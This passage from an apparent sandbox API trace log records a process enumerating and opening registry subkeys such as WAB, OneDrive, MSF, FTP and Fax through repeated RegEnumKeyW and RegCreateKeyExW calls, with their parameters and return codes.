lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.796] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.796] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.796] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2c, lpName=0x9aeb74, cchName=0xa | out: lpName="WAB") returned 0x0 [0057.796] RegCreateKeyExW (in: hKey=0x210, lpSubKey="WAB", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.797] RegCloseKey (hKey=0x214) returned 0x0 [0057.797] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.797] RegEnumKeyW (in: hKey=0x210, dwIndex=0x0, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.797] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.797] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1e, lpName=0x9aeb74, cchName=0xa | out: lpName="Pim") returned 0x0 [0057.797] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Pim", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.797] RegCloseKey (hKey=0x214) returned 0x0 [0057.797] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.797] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1b, lpName=0x9aeb74, cchName=0xa | out: lpName="OneDrive") returned 0x0 [0057.798] RegCreateKeyExW (in: hKey=0x210, lpSubKey="OneDrive", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.798] RegCloseKey (hKey=0x214) returned 0x0 [0057.798] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.798] RegEnumKeyW (in: hKey=0x210, dwIndex=0x13, lpName=0x9aeb74, cchName=0xa | out: lpName="Java VM") returned 0x0 [0057.798] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Java VM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.798] RegCloseKey (hKey=0x214) returned 0x0 [0057.798] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.798] RegEnumKeyW (in: hKey=0x210, dwIndex=0x20, lpName=0x9aeb74, cchName=0xa | out: lpName="Poom") returned 0x0 [0057.798] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Poom", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.799] RegCloseKey (hKey=0x214) returned 0x0 [0057.799] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.799] RegEnumKeyW (in: hKey=0x210, dwIndex=0x30, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.799] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.799] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1d, lpName=0x9aeb74, cchName=0xa | out: lpName="PeerNet") returned 0x0 [0057.799] RegCreateKeyExW (in: hKey=0x210, lpSubKey="PeerNet", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.799] RegCloseKey (hKey=0x214) returned 0x0 [0057.799] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.800] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.800] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.800] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2c, lpName=0x9aeb74, cchName=0xa | out: lpName="WAB") returned 0x0 [0057.800] RegCreateKeyExW (in: hKey=0x210, lpSubKey="WAB", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.800] RegCloseKey (hKey=0x214) returned 0x0 [0057.800] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.800] RegEnumKeyW (in: hKey=0x210, dwIndex=0x30, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.800] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.800] RegEnumKeyW (in: hKey=0x210, dwIndex=0x22, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.801] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.801] RegEnumKeyW (in: hKey=0x210, dwIndex=0x18, lpName=0x9aeb74, cchName=0xa | out: lpName="MSF") returned 0x0 [0057.801] RegCreateKeyExW (in: hKey=0x210, lpSubKey="MSF", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.801] RegCloseKey (hKey=0x214) returned 0x0 [0057.801] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.801] RegEnumKeyW (in: hKey=0x210, dwIndex=0x33, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.801] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.801] RegEnumKeyW (in: hKey=0x210, dwIndex=0x14, lpName=0x9aeb74, cchName=0xa | out: lpName="Keyboard") returned 0x0 [0057.801] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Keyboard", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.802] RegCloseKey (hKey=0x214) returned 0x0 [0057.802] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.802] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.802] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.802] RegEnumKeyW (in: hKey=0x210, dwIndex=0x34, lpName=0x9aeb74, cchName=0xa | out: lpName="Wisp") returned 0x0 [0057.802] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Wisp", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.802] RegCloseKey (hKey=0x214) returned 0x0 [0057.802] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.803] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2c, lpName=0x9aeb74, cchName=0xa | out: lpName="WAB") returned 0x0 [0057.803] RegCreateKeyExW (in: hKey=0x210, lpSubKey="WAB", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.803] RegCloseKey (hKey=0x214) returned 0x0 [0057.803] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.803] RegEnumKeyW (in: hKey=0x210, dwIndex=0x0, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.803] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.803] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1d, lpName=0x9aeb74, cchName=0xa | out: lpName="PeerNet") returned 0x0 [0057.803] RegCreateKeyExW (in: hKey=0x210, lpSubKey="PeerNet", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.803] RegCloseKey (hKey=0x214) returned 0x0 [0057.804] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.804] RegEnumKeyW (in: hKey=0x210, dwIndex=0x12, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.804] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.804] RegEnumKeyW (in: hKey=0x210, dwIndex=0x25, lpName=0x9aeb74, cchName=0xa | out: lpName="SkyDrive") returned 0x0 [0057.804] RegCreateKeyExW (in: hKey=0x210, lpSubKey="SkyDrive", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.804] RegCloseKey (hKey=0x214) returned 0x0 [0057.804] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.804] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1f, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.805] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.805] RegEnumKeyW (in: hKey=0x210, dwIndex=0xc, lpName=0x9aeb74, cchName=0xa | out: lpName="Fax") returned 0x0 [0057.805] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Fax", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.805] RegCloseKey (hKey=0x214) returned 0x0 [0057.805] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.805] RegEnumKeyW (in: hKey=0x210, dwIndex=0xe, lpName=0x9aeb74, cchName=0xa | out: lpName="FTP") returned 0x0 [0057.805] RegCreateKeyExW (in: hKey=0x210, lpSubKey="FTP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.805] RegCloseKey (hKey=0x214) returned 0x0 [0057.806] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.806] RegEnumKeyW (in: hKey=0x210, dwIndex=0x12, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.806] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.806] RegEnumKeyW (in: hKey=0x210, dwIndex=0xb, lpName=0x9aeb74, cchName=0xa | out: lpName="F12") returned 0x0 [0057.807] RegCreateKeyExW (in: hKey=0x210, lpSubKey="F12", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.807] RegCloseKey (hKey=0x214) returned 0x0 